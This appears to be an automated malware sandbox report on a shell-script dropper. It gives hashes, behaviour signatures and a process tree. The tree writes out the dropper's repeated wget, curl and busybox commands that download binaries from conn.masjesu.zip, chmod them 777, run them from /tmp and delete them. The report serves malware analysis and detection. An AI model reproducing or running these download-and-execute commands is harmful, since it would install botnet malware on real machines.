Analysis
-
max time kernel
129s -
max time network
132s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
21/10/2024, 01:27
Static task
static1
Behavioral task
behavioral1
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh
-
Size
10KB
-
MD5
3ef72a961095a0472a5f608928d2c772
-
SHA1
dc7795456334779680f17d1fd318e7026431bbcc
-
SHA256
80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2
-
SHA512
2deda53f3c8abdc9a80c6dccb0cdbf3e089b0f1e8a36747d4a07db5b4c153cfaa6a3e4ee1372ed7319b9b560faf35002fdbcca1033261b85ade67f2b68484c4a
-
SSDEEP
192:u7XDK1NRwo+TE7aAAfGXsQNqi3Ey0AAfGHsQNqiGXDK1NJ:u7XDK1NRwo+o7aAAfGFEtAAfGMXDK1NJ
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 998 chmod 886 chmod 914 chmod 984 chmod 956 chmod 977 chmod 731 chmod 872 chmod 879 chmod 942 chmod 790 chmod 800 chmod 907 chmod 837 chmod 893 chmod 928 chmod 935 chmod 949 chmod 963 chmod 844 chmod 851 chmod 865 chmod 900 chmod 970 chmod 991 chmod 776 chmod 858 chmod 921 chmod -
Executes dropped EXE 28 IoCs
ioc pid Process /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 732 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl 791 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J 801 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE 838 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj 845 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg 852 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 859 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq 866 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 873 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr 880 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ 887 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX 894 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 901 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 908 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj 915 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg 922 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 929 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq 936 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr 943 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ 950 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX 957 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 964 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE 971 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 978 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB 985 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl 992 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J 999 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 64 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 994 wget 751 curl 840 wget 850 busybox 871 busybox 885 busybox 910 wget 803 wget 855 curl 862 curl 983 busybox 945 wget 903 wget 906 busybox 917 wget 925 curl 927 busybox 939 curl 973 wget 721 curl 875 wget 882 wget 899 busybox 904 curl 967 curl 734 wget 883 curl 953 curl 959 wget 962 busybox 960 curl 980 wget 787 curl 789 busybox 799 busybox 848 curl 892 busybox 913 busybox 834 curl 836 busybox 861 wget 948 busybox 969 busybox 770 busybox 794 curl 869 curl 876 curl 911 curl 889 wget 890 curl 896 wget 897 curl 981 curl 729 busybox 931 wget 995 curl 843 busybox 920 busybox 941 busybox 857 busybox 864 busybox 868 wget 938 wget 997 busybox -
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 curl File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ curl File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 curl File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr curl File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj curl File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 curl File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB curl File opened for modification /tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27 curl File opened for modification /tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr curl File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg curl File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX curl File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE curl File opened for modification /tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB curl File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J curl File opened for modification /tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8 curl File opened for modification /tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg curl File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq curl File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 curl File opened for modification /tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX curl File opened for modification /tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ curl File opened for modification /tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE curl File opened for modification /tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj curl File opened for modification /tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq curl File opened for modification /tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17 curl File opened for modification /tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08 curl File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl curl File opened for modification /tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J curl File opened for modification /tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl curl
Processes
-
/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh/tmp/80eb02df3a5eb1e2581f6cc414c1c04647cd8590727092b482c68321197417b2.sh1⤵PID:699
-
/bin/rm/bin/rm bins.sh2⤵PID:701
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:706
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:721
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- System Network Configuration Discovery
PID:729
-
-
/bin/chmodchmod 777 upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- File and Directory Permissions Modification
PID:731
-
-
/tmp/upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA27./upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵
- Executes dropped EXE
PID:732
-
-
/bin/rmrm upnIFQE6qmYWQfMuek7r9Ddv9S6J6LwA272⤵PID:733
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:734
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:751
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- System Network Configuration Discovery
PID:770
-
-
/bin/chmodchmod 777 kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- File and Directory Permissions Modification
PID:776
-
-
/tmp/kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB./kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵
- Executes dropped EXE
PID:777
-
-
/bin/rmrm kzwLNg8Sm2aNqXynJCPbzF3UD944ItPoMB2⤵PID:780
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:782
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:787
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- System Network Configuration Discovery
PID:789
-
-
/bin/chmodchmod 777 X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- File and Directory Permissions Modification
PID:790
-
-
/tmp/X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl./X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵
- Executes dropped EXE
PID:791
-
-
/bin/rmrm X64ImeCSGO7FExR4gaIlMyL3js2JVxKuAl2⤵PID:792
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:793
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:794
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- System Network Configuration Discovery
PID:799
-
-
/bin/chmodchmod 777 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- File and Directory Permissions Modification
PID:800
-
-
/tmp/7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J./7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵
- Executes dropped EXE
PID:801
-
-
/bin/rmrm 7dOSj7XTTeiDO6ITb8rma11mRGUnDSJY1J2⤵PID:802
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:803
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:834
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- System Network Configuration Discovery
PID:836
-
-
/bin/chmodchmod 777 e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE./e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm e47EcNZAoQVP0Kjkijh1S0Yh4vjGqW67xE2⤵PID:839
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:840
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:843
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:846
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:847
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:848
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:850
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:851
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:852
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:853
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:854
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:855
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:857
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:858
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:859
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:860
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:861
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:862
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:864
-
-
/bin/chmodchmod 777 tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq./tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:867
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:868
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:871
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:873
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:874
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- System Network Configuration Discovery
PID:875
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:876
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:878
-
-
/bin/chmodchmod 777 xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- File and Directory Permissions Modification
PID:879
-
-
/tmp/xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr./xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵
- Executes dropped EXE
PID:880
-
-
/bin/rmrm xmY1daKifjRL8DntBPy6vzJlYaiFBKvWjr2⤵PID:881
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:882
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:883
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- System Network Configuration Discovery
PID:885
-
-
/bin/chmodchmod 777 ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ./ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm ECrxbush8tYuSk432QVFyv1qyVboRNDOWJ2⤵PID:888
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:889
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- System Network Configuration Discovery
PID:892
-
-
/bin/chmodchmod 777 p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- File and Directory Permissions Modification
PID:893
-
-
/tmp/p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX./p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵
- Executes dropped EXE
PID:894
-
-
/bin/rmrm p67N2F1sSMBlNjkQnYq5kiNY30JwMtizlX2⤵PID:895
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:896
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:897
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- System Network Configuration Discovery
PID:899
-
-
/bin/chmodchmod 777 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- File and Directory Permissions Modification
PID:900
-
-
/tmp/7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y08./7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵
- Executes dropped EXE
PID:901
-
-
/bin/rmrm 7N65Z5DyiZkovMtkq7Wb0pNoskTLhy4Y082⤵PID:902
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:903
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:904
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ8./47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵
- Executes dropped EXE
PID:908
-
-
/bin/rmrm 47XRfZvH3NeyvlHjPSudivBe0hWbm5YJQ82⤵PID:909
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:910
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- System Network Configuration Discovery
PID:913
-
-
/bin/chmodchmod 777 gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- File and Directory Permissions Modification
PID:914
-
-
/tmp/gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj./gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵
- Executes dropped EXE
PID:915
-
-
/bin/rmrm gTD7LQUPIgKpSj3dH3R862dKr4vpDmpENj2⤵PID:916
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:917
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:918
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- System Network Configuration Discovery
PID:920
-
-
/bin/chmodchmod 777 r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- File and Directory Permissions Modification
PID:921
-
-
/tmp/r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg./r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵
- Executes dropped EXE
PID:922
-
-
/bin/rmrm r5kv9qCUbmm7QoO49v4h0EFt7HpA4w3Rkg2⤵PID:923
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:924
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:925
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- System Network Configuration Discovery
PID:927
-
-
/bin/chmodchmod 777 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- File and Directory Permissions Modification
PID:928
-
-
/tmp/4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc17./4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵
- Executes dropped EXE
PID:929
-
-
/bin/rmrm 4OK2oXvuCoLJUvrmXYaGIQeOa0o96gVc172⤵PID:930
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- System Network Configuration Discovery
PID:931
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:932
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/tkOQ75TDk0Tbgja1Bof3tn1AqNuBnW6TAq2⤵PID:934
-
-
